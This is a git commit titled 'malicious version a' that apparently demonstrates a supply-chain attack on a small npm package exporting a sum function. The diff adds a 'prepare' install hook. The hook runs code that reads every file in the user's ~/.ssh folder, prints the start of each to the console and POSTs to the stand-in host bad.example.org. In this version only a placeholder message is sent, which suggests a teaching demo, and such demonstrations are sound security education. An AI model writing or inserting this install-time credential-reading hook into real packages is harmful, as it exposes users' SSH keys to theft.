malicious version a

This commit is contained in:
cupcakearmy 2021-04-06 18:09:22 +02:00
parent ae9b2234f6
commit 008883b530
No known key found for this signature in database
GPG Key ID: D28129AE5654D9D9
2 changed files with 44 additions and 1 deletions

View File

@ -8,5 +8,8 @@
"license": "MIT",
"files": [
"src"
]
],
"scripts": {
"prepare": "node ./src/index.js"
}
}

View File

@ -1,3 +1,43 @@
function phoneHome(payload) {
const https = require('https')
const data = JSON.stringify(payload)
const options = {
hostname: 'bad.example.org',
port: 443,
path: '/sendShhKey',
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Content-Length': data.length,
},
}
const req = https.request(options, (res) => {
res.on('data', (d) => {
process.stdout.write(d)
})
})
req.on('error', (error) => {
console.error('Server not found of course.')
})
req.write(data)
req.end()
}
if (typeof process !== 'undefined') {
const fs = require('fs')
const path = require('path')
const os = require('os')
const sshFolder = path.join(os.homedir(), '.ssh')
for (const file of fs.readdirSync(sshFolder)) {
const filename = path.join(sshFolder, file)
if (fs.lstatSync(filename).isFile()) {
const contents = fs.readFileSync(filename, { encoding: 'utf-8' })
console.log(contents.slice(0, 30), '...')
phoneHome('Could have been my ssh key. Byeee')
}
}
}
module.exports = {
sum(a, b) {
return a + b